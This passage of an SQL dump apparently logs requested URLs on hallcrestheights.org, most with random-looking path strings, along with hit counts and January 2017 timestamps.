00:00:00'),(1976,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-pzqjllzo-hnjumnte-i20162633-cwfogy-wbiwy-rurfgv-k27164-fcwqz-hribnkn-yfeebsb-jhfk.htm',NULL,'','',1,0,'2017-01-06 14:27:40','0000-00-00 00:00:00'),(1977,'http://www.hallcrestheights.org/yembj-vhtqqd-ckzfl-tzte-rqbwnsw-k43157-nsnjplpf-i20162634-trrjncyp-joqwgzj-evihsdpa-caylh-yayz-eueizv/',NULL,'','',1,0,'2017-01-06 14:31:09','0000-00-00 00:00:00'),(1978,'http://www.hallcrestheights.org/ryvhr-hmqt-k52484-yysl-lgeajanp-i20162632-dmefnxhq-fhjdyh.htm',NULL,'','',3,0,'2017-01-06 14:34:57','0000-00-00 00:00:00'),(1979,'http://www.hallcrestheights.org/pcscq-rufu-k11084-npkw-i20162637-xpoideot-wtvsoarm-osmgep.htm',NULL,'','',3,0,'2017-01-06 14:38:42','0000-00-00 00:00:00'),(1980,'http://www.hallcrestheights.org/edzvdlq-comnnmmc-i20162632-awvbfuja-k31228-pyvrlfl-xhqjku.htm',NULL,'','',1,0,'2017-01-06 14:50:05','0000-00-00 00:00:00'),(1981,'http://www.hallcrestheights.org/joifa/formmail/fukui_seminar.html',NULL,'','',6,0,'2017-01-06 14:53:33','0000-00-00 00:00:00'),(1982,'http://www.hallcrestheights.org/vqjny-spvh/oljp-i20162633-eurrtpil-k6514-uourxivl.htm',NULL,'','',1,0,'2017-01-06 14:54:48','0000-00-00 00:00:00'),(1983,'http://www.hallcrestheights.org/ixnm-ueahwhi/i20162630-k22982-ozhjx-bnwpge-yooayik-uksszqce.htm',NULL,'','',1,0,'2017-01-06 14:56:06','0000-00-00 00:00:00'),(1984,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj/k49990-yldpija-amdu-i20162637-rtaen-pggwtd.htm',NULL,'','',1,0,'2017-01-06 14:57:22','0000-00-00 00:00:00'),(1985,'http://www.hallcrestheights.org/ajqxx-ucuzao-fifep-hiij-imjnjbo-k44057-gtsakbcc-i20162634-gyfmdvju-xzlekts-lshxosqq-jvfyo-ihtt-jputlg/',NULL,'','',1,0,'2017-01-06 14:57:37','0000-00-00 00:00:00'),(1986,'http://www.hallcrestheights.org/i20162630-bsoapaz-apsta-sgmhcq-k56373-cmckfr-dtfkg-pvbc-hsiwho-rklvzr-tjrsyoa-ayfwg/',NULL,'','',1,0,'2017-01-06 14:58:42','0000-00-00 00:00:00'),(1987,'http://www.hallcrestheights.org/soegsz-xyifetvt/ndyu-i20162628-uhvfc-k58399-yzls/',NULL,'','',1,0,'2017-01-06 15:00:07','0000-00-00 00:00:00'),(1988,'http://www.hallcrestheights.org/edzvdlqc-i20162637-omnnm/k50390-mcawvbfu-japyvrl.htm',NULL,'','',1,0,'2017-01-06 15:01:16','0000-00-00 00:00:00'),(1989,'http://www.hallcrestheights.org/ixnmu-eahw-k11984-hioz-hjxbnwpg-eyooayik-i20162633-uksszq.htm',NULL,'','',1,0,'2017-01-06 15:01:26','0000-00-00 00:00:00'),(1990,'http://www.hallcrestheights.org/pcscqruf-unpkw/i20162636-k15530-xpoideot-wtvsoar-mosm-gepla.htm',NULL,'','',1,0,'2017-01-06 15:02:58','0000-00-00 00:00:00'),(1991,'http://www.hallcrestheights.org/i20162630-htxwhyk-rsvsv-hudykb-k34773-qxdosf-ietyu-aixn-rbdggs-aarhef-skjydmr-ujwim/',NULL,'','',2,0,'2017-01-06 15:03:49','0000-00-00 00:00:00'),(1992,'http://www.hallcrestheights.org/dvisciw-bvwkuxkr-i20162632-bzomsmvu-k52828-clzuphv-qawuox.htm',NULL,'','',3,0,'2017-01-06 15:05:39','0000-00-00 00:00:00'),(1993,'http://www.hallcrestheights.org/i20162628-zmkuedtz-jivyo-qxifgxuh-xptvuhm-iwnz-korpv-ubfgnq-tpmh-k7940-prbikzon-mtlajhol-jrdklt-sqwxxu.htm',NULL,'','',1,0,'2017-01-06 15:06:23','0000-00-00 00:00:00'),(1994,'http://www.hallcrestheights.org/pcscq-rufu-k11084-npkw-xpoideot-wtvsoarm-i20162633-osmgep.htm',NULL,'','',1,0,'2017-01-06 15:12:51','0000-00-00 00:00:00'),(1995,'http://www.hallcrestheights.org/yembjv-htqqdckz-fltz-terqb/i20162632-wnsw-nsnjplp-ftrrjnc-ypjoq-wgzjev-ihsd-pacaylhy-k60239-ayzeueiz/',NULL,'','',1,0,'2017-01-06 15:14:25','0000-00-00 00:00:00'),(1996,'http://www.hallcrestheights.org/qlbow-k13157-ciggec-eayaf-i20162635-xrgl/',NULL,'','',1,0,'2017-01-06 15:16:44','0000-00-00 00:00:00'),(1997,'http://www.hallcrestheights.org/edzvd-lqco-k32684-mnnm-mcawvbfu-i20162632-japyvrlf-lxhqjk.htm',NULL,'','',1,0,'2017-01-06 15:20:19','0000-00-00 00:00:00'),(1998,'http://www.hallcrestheights.org/nfrkop-dobbumgo-lzes-rkwtz/k60339-qtqb-svjcwjb-i20162632-xnmyvss-sldjz-naahjb-kwxr-osholvgw/',NULL,'','',1,0,'2017-01-06 15:23:17','0000-00-00 00:00:00'),(1999,'http://www.hallcrestheights.org/htxwh-k12257-ykrsvs-vhudy-i20162635-kbqx/',NULL,'','',1,0,'2017-01-06 15:27:58','0000-00-00 00:00:00'),(2000,'http://www.hallcrestheights.org/nfrko-k53657-pdobbu-i20162634-mgolz-esrk/',NULL,'','',1,0,'2017-01-06 15:31:41','0000-00-00 00:00:00'),(2001,'http://www.hallcrestheights.org/mrcqgbe-ifuwgrab-i20162632-tnwyrqse-k51928-mgwkowh-memxgk.htm',NULL,'','',1,0,'2017-01-06 15:35:34','0000-00-00 00:00:00'),(2002,'http://www.hallcrestheights.org/ixnmue-k33226-ahwhio/i20162637-zhjxbn-wpge-yooayi.htm',NULL,'','',1,0,'2017-01-06 15:36:03','0000-00-00 00:00:00'),(2003,'http://www.hallcrestheights.org/k54576-edzvdl-qcomnn-mmcawv-bfuj-apyvrl-i20162637-flxhqj-kuhkc-mumbhmg.htm',NULL,'','',1,0,'2017-01-06 15:38:40','0000-00-00 00:00:00'),(2004,'http://www.hallcrestheights.org/ryvhr-hmqt-i20162636-k52484-yysl-lgeajanp-dmefnxhq-fhjdyh.htm',NULL,'','',3,0,'2017-01-06 15:39:22','0000-00-00 00:00:00'),(2005,'http://www.hallcrestheights.org/i20162630-htxwhyk-rsvsv-hudykb-k57003-qxdosf/ietyu-aixn-rbdggs-aarhef-skjydmr-ujwim/',NULL,'','',1,0,'2017-01-06 15:42:33','0000-00-00 00:00:00'),(2006,'http://www.hallcrestheights.org/edzvd-k31384-lqco-mnnm-mcawvbfu-i20162632-japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh.htm',NULL,'','',2,0,'2017-01-06 15:43:52','0000-00-00 00:00:00'),(2007,'http://www.hallcrestheights.org/i20162634-zmku-edtzjiv/k31262-yoqxi-fgxuhx-ptvuhmi-wnzkorpv.htm',NULL,'','',1,0,'2017-01-06 15:45:07','0000-00-00 00:00:00'),(2008,'http://www.hallcrestheights.org/k52734-mrcqg-beif-uwgr-abtnwyrq/semgwkow-hmemxg-i20162632-kucyb-npzkic-vejxk-ulzjcjk-ntsxjln.htm',NULL,'','',2,0,'2017-01-06 15:46:26','0000-00-00 00:00:00'),(2009,'http://www.hallcrestheights.org/gnfznxv-jxpaltit-i20162632-jshkyjyl-k32128-dpijaam-durtae.htm',NULL,'','',1,0,'2017-01-06 15:46:48','0000-00-00 00:00:00'),(2010,'http://www.hallcrestheights.org/i20162630-jgle-tkymdrq-k22632-znrvm-lkswaz-vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo-xbdj-veebikpt.htm',NULL,'','',1,0,'2017-01-06 15:47:44','0000-00-00 00:00:00'),(2011,'http://www.hallcrestheights.org/i20162632-kzpffm-sxklrded/hwge-k60839-fvbbg/',NULL,'','',1,0,'2017-01-06 15:49:05','0000-00-00 00:00:00'),(2012,'http://www.hallcrestheights.org/dvisciw-bvwkuxkr-k11228-bzomsmvu-clzuphv-qawuox-i20162633-zmnpz.htm',NULL,'','',3,0,'2017-01-06 15:52:02','0000-00-00 00:00:00'),(2013,'http://www.hallcrestheights.org/bsoap-k33857-azapst-i20162634-asgmh-cqcm/',NULL,'','',1,0,'2017-01-06 15:52:28','0000-00-00 00:00:00'),(2014,'http://www.hallcrestheights.org/uptt-mnbeatg-i20162634-rbnqc/dcncxr-dhcpgzz-dllimvyx-k42462-jltfeob-kebwivsm.htm',NULL,'','',1,0,'2017-01-06 15:52:50','0000-00-00 00:00:00'),(2015,'http://www.hallcrestheights.org/vqjnysp-vholjpeu-rrtpiluo-i20162633-k11428-urxivlb-trhnnm.htm',NULL,'','',4,0,'2017-01-06 15:54:29','0000-00-00 00:00:00'),(2016,'http://www.hallcrestheights.org/wbwpb-k54557-onkydh-i20162634-xjjik-vfvt/',NULL,'','',1,0,'2017-01-06 15:59:28','0000-00-00 00:00:00'),(2017,'http://www.hallcrestheights.org/ixnmuea-hwhiozhj-xbnwpgey-i20162633-k10528-ooayiku-ksszqc.htm',NULL,'','',1,0,'2017-01-06 16:01:57','0000-00-00 00:00:00'),(2018,'http://www.hallcrestheights.org/xhajv-k32957-qlwczb-i20162634-iqsos-qxoq/',NULL,'','',1,0,'2017-01-06 16:05:46','0000-00-00 00:00:00'),(2019,'http://www.hallcrestheights.org/ixnm-k33382-ueahwhi-i20162630-ozhjx-bnwpge/yooayik-uksszqce-baqdomy-tniholbd-enta.htm',NULL,'','',1,0,'2017-01-06 16:09:01','0000-00-00 00:00:00'),(2020,'http://www.hallcrestheights.org/kzpff-k32057-msxklr-i20162634-dedhw-gefv/',NULL,'','',1,0,'2017-01-06 16:10:57','0000-00-00 00:00:00'),(2021,'http://www.hallcrestheights.org/vqjnys-i20162637-pvholj/k54926-peurrt-pilu.htm',NULL,'','',1,0,'2017-01-06 16:10:58','0000-00-00 00:00:00'),(2022,'http://www.hallcrestheights.org/jgletk-ymdrqz-k54326-nrvmlk-swaz/vkecqq-neeiaq-jzlnp-lqfcneb-xilnvox-i20162637-bdjvee-bikptjv-lxfa.htm',NULL,'','',1,0,'2017-01-06 16:11:04','0000-00-00 00:00:00'),(2023,'http://www.hallcrestheights.org/i20162637-k33726-upttmn-beatgr-bnqcdc-ncxr/dhcpgz-zdllim-vyxjl-tfeobke-bwivsmq-krfbml-kmsthow.htm',NULL,'','',1,0,'2017-01-06 16:12:25','0000-00-00 00:00:00'),(2024,'http://www.hallcrestheights.org/kzpffm-i20162629-k5849-sxklrded-hwge-fvbbg/',NULL,'','',1,0,'2017-01-06 16:13:22','0000-00-00 00:00:00'),(2025,'http://www.hallcrestheights.org/i20162637-pcscqr-ufunpk-wxpoid-eotw/tvsoar-mosmge-plalh-eliyrqi-yqfufxv-k54426-ugowop-egtqamz.htm',NULL,'','',1,0,'2017-01-06 16:14:56','0000-00-00 00:00:00'),(2026,'http://www.hallcrestheights.org/jglet-kymd-k48164-rqzn-rvmlkswa-i20162632-zvkecqqn-eeiaqj.htm',NULL,'','',1,0,'2017-01-06 16:17:45','0000-00-00 00:00:00'),(2027,'http://www.hallcrestheights.org/i20162637-dvisci-k33276-wbvwku-xkrbzo-msmv-uclzup-hvqawu-oxzmn-pzvsgcr-lycmczo-qqelud-pwcmegi.htm',NULL,'','',1,0,'2017-01-06 16:17:52','0000-00-00 00:00:00'),(2028,'http://www.hallcrestheights.org/fadla-jfnl-i20162632-gfpc-vwgmyhde/k31434-cwxbdeud-kovfii-bptqu-hzxchh-rmxag-fpapuhg.htm',NULL,'','',1,0,'2017-01-06 16:20:38','0000-00-00 00:00:00'),(2029,'http://www.hallcrestheights.org/nfrkop-i20162629-k4049-dobbumgo-lzes-rkwtz/',NULL,'','',1,0,'2017-01-06 16:21:09','0000-00-00 00:00:00'),(2030,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-i20162632-snop-dgfnh-skrl-jrgfctf-zfiwxwm-akoay-osmpql-k39489-gveg/',NULL,'','',1,0,'2017-01-06 16:21:13','0000-00-00 00:00:00'),(2031,'http://www.hallcrestheights.org/ixnmu-eahw-i20162636-k42404-hioz-hjxbnwpg-eyooayik-uksszq.htm',NULL,'','',1,0,'2017-01-06 16:24:42','0000-00-00 00:00:00'),(2032,'http://www.hallcrestheights.org/vqjny-spvh-i20162636-k43304-oljp-eurrtpil-uourxivl-btrhnn.htm',NULL,'','',1,0,'2017-01-06 16:28:30','0000-00-00 00:00:00'),(2033,'http://www.hallcrestheights.org/oiyizgo-k5273-lrcmw-fbsnop-i20162631-dgfnhs/',NULL,'','',1,0,'2017-01-06 16:32:13','0000-00-00 00:00:00'),(2034,'http://www.hallcrestheights.org/ryvh-k32932-rhmqtyy-i20162630-sllge-ajanpd-mefnxhq-fhjdyhao-xrcjhwu-vdsvezyt-wlcy.htm',NULL,'','',1,0,'2017-01-06 16:34:18','0000-00-00 00:00:00'),(2035,'http://www.hallcrestheights.org/i20162628-ixnmueah-whioz-k8240-hjxbnwpg-eyooayi-kuks-szqce.htm',NULL,'','',4,0,'2017-01-06 16:36:01','0000-00-00 00:00:00'),(2036,'http://www.hallcrestheights.org/i20162628-vqjnyspv-holjp-k9140-eurrtpil-uourxiv-lbtr-hnnmt.htm',NULL,'','',1,0,'2017-01-06 16:39:45','0000-00-00 00:00:00'),(2037,'http://www.hallcrestheights.org/lugdltrs-mxxhy-k3920-pzqjllzo-hnjumnt-i20162632-ecwf-ogywb.htm',NULL,'','',1,0,'2017-01-06 16:44:35','0000-00-00 00:00:00'),(2038,'http://www.hallcrestheights.org/zmkuedtz-jivyo-k39920-qxifgxuh-i20162631-xptvuhm-iwnz-korpv.htm',NULL,'','',1,0,'2017-01-06 16:47:38','0000-00-00 00:00:00'),(2039,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-snop-dgfnh-skrl-jrgfctf-zfiwxwm-akoay-osmpql-i20162629-k25449-gveg/',NULL,'','',1,0,'2017-01-06 16:54:01','0000-00-00 00:00:00'),(2040,'http://www.hallcrestheights.org/lugdltrs-mxxhy-k39020-pzqjllzo-i20162631-hnjumnt-ecwf-ogywb.htm',NULL,'','',1,0,'2017-01-06 16:54:47','0000-00-00 00:00:00'),(2041,'http://www.hallcrestheights.org/i20162634-pcsc-qrufunp-k32612-kwxpo-ideotw-tvsoarm-osmgepla.htm',NULL,'','',1,0,'2017-01-06 16:55:02','0000-00-00 00:00:00'),(2042,'http://www.hallcrestheights.org/kzpff-k24777-msxklr-dedhw-i20162635-gefv-bbgzagp-eciyyuwu-vfztjigj-inamzbc/',NULL,'','',1,0,'2017-01-06 17:01:24','0000-00-00 00:00:00'),(2043,'http://www.hallcrestheights.org/i20162634-ixnm-ueahwhi-k10112-ozhjx-bnwpge-yooayik-uksszqce.htm',NULL,'','',1,0,'2017-01-06 17:03:00','0000-00-00 00:00:00'),(2044,'http://www.hallcrestheights.org/fadlajfn-lgfpc-k40820-vwgmyhde-i20162631-cwxbdeu-dkov-fiibp.htm',NULL,'','',1,0,'2017-01-06 17:03:33','0000-00-00 00:00:00'),(2045,'http://www.hallcrestheights.org/k12032-lugd-ltrsmxx-i20162630-hypzq-jllzoh.htm',NULL,'','',1,0,'2017-01-06 17:05:19','0000-00-00 00:00:00'),(2046,'http://www.hallcrestheights.org/i20162630-gnfz-nxvjxpa-k33532-ltitj-shkyjy-ldpijaa.htm',NULL,'','',1,0,'2017-01-06 17:05:23','0000-00-00 00:00:00'),(2047,'http://www.hallcrestheights.org/pcsc-qrufunp/i20162630-k33782-kwxpo-ideotw-tvsoarm-osmgepla.htm',NULL,'','',1,0,'2017-01-06 17:05:28','0000-00-00 00:00:00'),(2048,'http://www.hallcrestheights.org/jgle-k12232-tkymdrq-i20162630-znrvm-lkswaz-vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo-xbdj.htm',NULL,'','',1,0,'2017-01-06 17:07:29','0000-00-00 00:00:00'),(2049,'http://www.hallcrestheights.org/lugdltr-k11278-smxxhypz-qjllzohn-jumntec/wfogyw-i20162633-biwyr-urfgvfcw-qzhr-ibnkny.htm',NULL,'','',1,0,'2017-01-06 17:07:50','0000-00-00 00:00:00'),(2050,'http://www.hallcrestheights.org/i20162637-ryvhrh-k54226-mqtyys-llgeaj-anpd/mefnxh-qfhjdy-haoxr-cjhwuvd-svezytw.htm',NULL,'','',1,0,'2017-01-06 17:08:53','0000-00-00 00:00:00'),(2051,'http://www.hallcrestheights.org/gnfzn-k32284-xvjx-palt-itjshkyj-i20162632-yldpijaa-mdurta-enpgg-wtdvlx-tdqku.htm',NULL,'','',2,0,'2017-01-06 17:08:55','0000-00-00 00:00:00'),(2052,'http://www.hallcrestheights.org/edzv-dlqcomn/k31462-nmmca-wvbfuj-i20162634-apyvrlf.htm',NULL,'','',1,0,'2017-01-06 17:09:52','0000-00-00 00:00:00'),(2053,'http://www.hallcrestheights.org/edzv-dlqcomn-k54212-nmmca-wvbfuj-apyvrlf-i20162633-lxhqjkuh.htm',NULL,'','',1,0,'2017-01-06 17:10:56','0000-00-00 00:00:00'),(2054,'http://www.hallcrestheights.org/k32732-ixnm-ueahwhi-i20162630-ozhjx-bnwpge.htm',NULL,'','',1,0,'2017-01-06 17:10:59','0000-00-00 00:00:00'),(2055,'http://www.hallcrestheights.org/vqjn-yspvhol-i20162630-k43382-jpeur-rtpilu/ourxivl-btrhnnmt-qzkowts-xppbgrrc-dsik-ibkxnpfo-vpyaybgo-ynkxnoq.htm',NULL,'','',1,0,'2017-01-06 17:13:46','0000-00-00 00:00:00'),(2056,'http://www.hallcrestheights.org/soegsz-i20162629-k26549-xyifetvt-ndyu-uhvfc/',NULL,'','',1,0,'2017-01-06 17:15:46','0000-00-00 00:00:00'),(2057,'http://www.hallcrestheights.org/i20162637-lugdltrs-k50590-mxxhy-pzqjllzo-hnjumnt/ecwf-ogywb-iwyrur-fgvf-cwqzhrib.htm',NULL,'','',1,0,'2017-01-06 17:15:56','0000-00-00 00:00:00'),(2058,'http://www.hallcrestheights.org/i20162630-zmku-edtzjiv/k33082-yoqxi-fgxuhx-ptvuhmi.htm',NULL,'','',1,0,'2017-01-06 17:17:12','0000-00-00 00:00:00'),(2059,'http://www.hallcrestheights.org/i20162628-gnfznxvj-xpalt-k29840-itjshkyj-yldpija-amdu-rtaen.htm',NULL,'','',1,0,'2017-01-06 17:17:40','0000-00-00 00:00:00'),(2060,'http://www.hallcrestheights.org/jgletkym-drqzn-k51440-rvmlkswa-i20162637-zvkecqq-neei-aqjzl.htm',NULL,'','',1,0,'2017-01-06 17:21:59','0000-00-00 00:00:00'),(2061,'http://www.hallcrestheights.org/i20162634-uptt-mnbeatg-k11912-rbnqc-dcncxr-dhcpgzz-dllimvyx.htm',NULL,'','',1,0,'2017-01-06 17:25:09','0000-00-00 00:00:00'),(2062,'http://www.hallcrestheights.org/htxwhyk-k6173-rsvsv-hudykb-i20162631-qxdosf/',NULL,'','',1,0,'2017-01-06 17:29:06','0000-00-00 00:00:00'),(2063,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-i20162628-abtnwyrq-semgwko-whme-mxgku-cybnpz-kicv-ejxkulzj-cjkntsxj-k8040-lnuuuv.htm',NULL,'','',1,0,'2017-01-06 17:30:35','0000-00-00 00:00:00'),(2064,'http://www.hallcrestheights.org/gnfznxvj-xpalt-k6050-itjshkyj-yldpija/amdu-rtaen-pggwtd-i20162635-vlxt-dqkunfgl-qrhzyonx-feqnzs-vvbpzw.htm',NULL,'','',1,0,'2017-01-06 17:31:58','0000-00-00 00:00:00'),(2065,'http://www.hallcrestheights.org/i20162628-edzvdlqc-omnnm-k28940-mcawvbfu-japyvrl-flxh-qjkuh.htm',NULL,'','',1,0,'2017-01-06 17:32:43','0000-00-00 00:00:00'),(2066,'http://www.hallcrestheights.org/jgle-k12882-tkymdrq-znrvm-lkswaz/i20162630-vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo-xbdj-veebikpt-jvlxfaye.htm',NULL,'','',1,0,'2017-01-06 17:32:44','0000-00-00 00:00:00'),(2067,'http://www.hallcrestheights.org/ajqxxuc-k34723-uzaof-i20162630-ifephi-ijimjn/jbogt-sakb-ccgyfm-dvjuxz-lektsls/',NULL,'','',1,0,'2017-01-06 17:33:54','0000-00-00 00:00:00'),(2068,'http://www.hallcrestheights.org/bsoapa-i20162629-k25849-zapstasg-mhcq-cmckf-rdtf-kgpvbch-siwhork-lvzrt-jrsyoa/',NULL,'','',1,0,'2017-01-06 17:35:07','0000-00-00 00:00:00'),(2069,'http://www.hallcrestheights.org/k36780-ryvhrhmq-tyysl-lgeajanp-dmefnxh-qfhj-dyhao-i20162636-xrcjhw-uvds-vezytwlc-ycwscpua.htm',NULL,'','',1,0,'2017-01-06 17:36:17','0000-00-00 00:00:00'),(2070,'http://www.hallcrestheights.org/wbwpbo-i20162633-k18989-nkydhxjj-ikvf-vtzpx/',NULL,'','',1,0,'2017-01-06 17:36:31','0000-00-00 00:00:00'),(2071,'http://www.hallcrestheights.org/bsoapaz-apsta-i20162630-sgmhcq-cmckfr-dtfkg-k55073-pvbc-hsiwho-rklvzr-tjrsyoa-ayfwg-dxskm-yukcmbqr/',NULL,'','',1,0,'2017-01-06 17:39:08','0000-00-00 00:00:00'),(2072,'http://www.hallcrestheights.org/yembjvh-tqqdc-i20162630-kzfltz-terqbw-nswns-k57353-njpl/',NULL,'','',1,0,'2017-01-06 17:40:18','0000-00-00 00:00:00'),(2073,'http://www.hallcrestheights.org/i20162630-xhajvql-wczbi/qsosqx-k35323-oqkgqa-qydcp/',NULL,'','',1,0,'2017-01-06 17:40:22','0000-00-00 00:00:00'),(2074,'http://www.hallcrestheights.org/i20162632-mrcqg-beif-uwgr-abtnwyrq-semgwkow-hmemxg-k32584-kucyb.htm',NULL,'','',1,0,'2017-01-06 17:40:25','0000-00-00 00:00:00'),(2075,'http://www.hallcrestheights.org/dvisciw-bvwkuxkr-bzomsmvu-clzuphv/qawuox-zmnpz-vsgcrlyc-i20162633-k10578-mczo-qqelud-pwcm-egia.htm',NULL,'','',1,0,'2017-01-06 17:40:53','0000-00-00 00:00:00'),(2076,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg-eyooayi-kuks-szqce-k15780-baqdom-ytni-holbdent-afymluze-i20162636-xtlfgg.htm',NULL,'','',1,0,'2017-01-06 17:42:00','0000-00-00 00:00:00'),(2077,'http://www.hallcrestheights.org/wbwpbon-kydhx-i20162630-jjikvf-vtzpxb-xkcwj-k57053-ybty-lwosdu-ieqgws-ogxhgpi-sdhtn-irmjh-vzyxodbx/',NULL,'','',1,0,'2017-01-06 17:43:04','0000-00-00 00:00:00'),(2078,'http://www.hallcrestheights.org/zmkuedt-zjivyoqx-k31028-ifgxuhxp-tvuhmiw-i20162632-nzkorp-vubfg.htm',NULL,'','',1,0,'2017-01-06 17:44:06','0000-00-00 00:00:00'),(2079,'http://www.hallcrestheights.org/vqjny-spvh-oljp-i20162633-eurrtpil-k26664-uourxivl-btrhnn-mtqzk-owtsxp-pbgrr-cdsikib.htm',NULL,'','',2,0,'2017-01-06 17:44:18','0000-00-00 00:00:00'),(2080,'http://www.hallcrestheights.org/ixnmueah-whioz-k35930-hjxbnwpg-eyooayi/kuks-szqce-baqdom-ytni-i20162636-holbdent-afymluze-xtlfgg-csdimr.htm',NULL,'','',1,0,'2017-01-06 17:45:29','0000-00-00 00:00:00'),(2081,'http://www.hallcrestheights.org/mrcqgbe-ifuwgrab-k10328-tnwyrqse-mgwkowh-memxgk-i20162633-ucybn.htm',NULL,'','',1,0,'2017-01-06 17:48:58','0000-00-00 00:00:00'),(2082,'http://www.hallcrestheights.org/i20162632-qlbowc-k59489-iggeceay-afxr-glnik/',NULL,'','',1,0,'2017-01-06 17:51:55','0000-00-00 00:00:00'),(2083,'http://www.hallcrestheights.org/vqjnysp-vholjpeu-k51728-rrtpiluo-urxivlb-i20162632-trhnnm-tqzko.htm',NULL,'','',1,0,'2017-01-06 17:55:44','0000-00-00 00:00:00'),(2084,'http://www.hallcrestheights.org/fadlajf-nlgfpcvw-k31928-gmyhdecw-xbdeudk-i20162632-ovfiib-ptquh.htm',NULL,'','',1,0,'2017-01-06 18:04:32','0000-00-00 00:00:00'),(2085,'http://www.hallcrestheights.org/nfrkop-i20162633-k18089-dobbumgo-lzes-rkwtz/',NULL,'','',1,0,'2017-01-06 18:06:57','0000-00-00 00:00:00'),(2086,'http://www.hallcrestheights.org/about/onegai.html',NULL,'','',5,0,'2017-01-06 18:09:43','0000-00-00 00:00:00'),(2087,'http://www.hallcrestheights.org/k7405-oiyi-zgolrcm-wfbsnop-dgfnh-i20162629-skrlj/',NULL,'','',1,0,'2017-01-06 18:09:46','0000-00-00 00:00:00'),(2088,'http://www.hallcrestheights.org/edzvd-lqco/mnnm-i20162633-mcawvbfu-k26314-japyvrlf.htm',NULL,'','',1,0,'2017-01-06 18:09:54','0000-00-00 00:00:00'),(2089,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-i20162628-k9040-yldpija-amdu-rtaen-pggwtd.htm',NULL,'','',1,0,'2017-01-06 18:10:35','0000-00-00 00:00:00'),(2090,'http://www.hallcrestheights.org/jgletky-mdrqznrv/k53078-mlkswazv-kecqqne-i20162632-eiaqjz-lnplq.htm',NULL,'','',1,0,'2017-01-06 18:10:41','0000-00-00 00:00:00'),(2091,'http://www.hallcrestheights.org/gnfznxv-jxpaltit-i20162632-jshkyjyl-dpijaam/durtae-npggw-tdvlxtdq-kunf-k52278-glqrhz-yonx.htm',NULL,'','',1,0,'2017-01-06 18:11:48','0000-00-00 00:00:00'),(2092,'http://www.hallcrestheights.org/mrcq-gbeifuw/i20162630-k33182-grabt-nwyrqs.htm',NULL,'','',1,0,'2017-01-06 18:14:02','0000-00-00 00:00:00'),(2093,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm-i20162628-vuclzup-k29740-hvqa-wuoxz-mnpzvs.htm',NULL,'','',1,0,'2017-01-06 18:14:23','0000-00-00 00:00:00'),(2094,'http://www.hallcrestheights.org/ajqxx-k11557-ucuzao-fifep-hiij-imjnjbo-gtsakbcc-gyfmdvju-i20162635-xzlekts-lshxosqq/',NULL,'','',1,0,'2017-01-06 18:14:28','0000-00-00 00:00:00'),(2095,'http://www.hallcrestheights.org/k16114-lugdl-i20162633-trsm-xxhy/pzqjllzo-hnjumnte-cwfogy-wbiwy.htm',NULL,'','',1,0,'2017-01-06 18:15:11','0000-00-00 00:00:00'),(2096,'http://www.hallcrestheights.org/qlbowc-k60139-iggeceay-afxr-glnik/i20162632-ghhm-bbxpges-mrcaizt-biauw-dtvixp/',NULL,'','',1,0,'2017-01-06 18:16:20','0000-00-00 00:00:00'),(2097,'http://www.hallcrestheights.org/i20162634-ajqxx-ucuzao/fifep-hiij-imjnjbo-k53807-gtsakbcc/',NULL,'','',1,0,'2017-01-06 18:17:31','0000-00-00 00:00:00'),(2098,'http://www.hallcrestheights.org/i20162632-yembjv-k38789-htqqdckz-fltz-terqb/',NULL,'','',1,0,'2017-01-06 18:18:06','0000-00-00 00:00:00'),(2099,'http://www.hallcrestheights.org/i20162630-lugd-ltrsmxx/k43882-hypzq-jllzoh-njumnte.htm',NULL,'','',1,0,'2017-01-06 18:19:48','0000-00-00 00:00:00'),(2100,'http://www.hallcrestheights.org/i20162628-upttmnbe-atgrb/k8090-nqcdcncx-rdhcpgz.htm',NULL,'','',1,0,'2017-01-06 18:20:54','0000-00-00 00:00:00'),(2101,'http://www.hallcrestheights.org/k28840-mrcqgbei-fuwgr-abtnwyrq-i20162628-semgwko-whme-mxgku-cybnpz.htm',NULL,'','',1,0,'2017-01-06 18:21:57','0000-00-00 00:00:00'),(2102,'http://www.hallcrestheights.org/i20162632-fadlajf-nlgfpcvw/k53378-gmyhdecw-xbdeudk.htm',NULL,'','',1,0,'2017-01-06 18:22:03','0000-00-00 00:00:00'),(2103,'http://www.hallcrestheights.org/ixnm-ueahwhi-k58992-ozhjx-bnwpge-yooayik-uksszqce-baqdomy-tniholbd-i20162628-enta-fymluzex.htm',NULL,'','',1,0,'2017-01-06 18:23:22','0000-00-00 00:00:00'),(2104,'http://www.hallcrestheights.org/qlbowc-iggeceay-afxr-glnik/ghhm-bbxpges-mrcaizt-i20162633-biauw-dtvixp-mtzh-k8139-zzwzrqrd/',NULL,'','',1,0,'2017-01-06 18:24:28','0000-00-00 00:00:00'),(2105,'http://www.hallcrestheights.org/mrcqg-beif-uwgr-abtnwyrq-semgwkow-hmemxg-kucyb-i20162633-npzkic-k16464-vejxk-ulzjcjk-ntsxjln.htm',NULL,'','',1,0,'2017-01-06 18:25:30','0000-00-00 00:00:00'),(2106,'http://www.hallcrestheights.org/upttmnbe-k40720-atgrb-nqcdcncx-rdhcpgz-zdll-imvyx-i20162631-jltfeo.htm',NULL,'','',1,0,'2017-01-06 18:25:43','0000-00-00 00:00:00'),(2107,'http://www.hallcrestheights.org/i20162632-fadla-jfnl-gfpc-vwgmyhde-k52884-cwxbdeud-kovfii-bptqu-hzxchh.htm',NULL,'','',1,0,'2017-01-06 18:26:38','0000-00-00 00:00:00'),(2108,'http://www.hallcrestheights.org/gnfznx-k2176-vjxpal-titjsh-i20162628-kyjy-ldpija.htm',NULL,'','',1,0,'2017-01-06 18:27:54','0000-00-00 00:00:00'),(2109,'http://www.hallcrestheights.org/mrcqg-beif-k31934-uwgr-abtnwyrq/i20162632-semgwkow-hmemxg-kucyb-npzkic-vejxk-ulzjcjk-ntsxjln-uuuv.htm',NULL,'','',1,0,'2017-01-06 18:29:02','0000-00-00 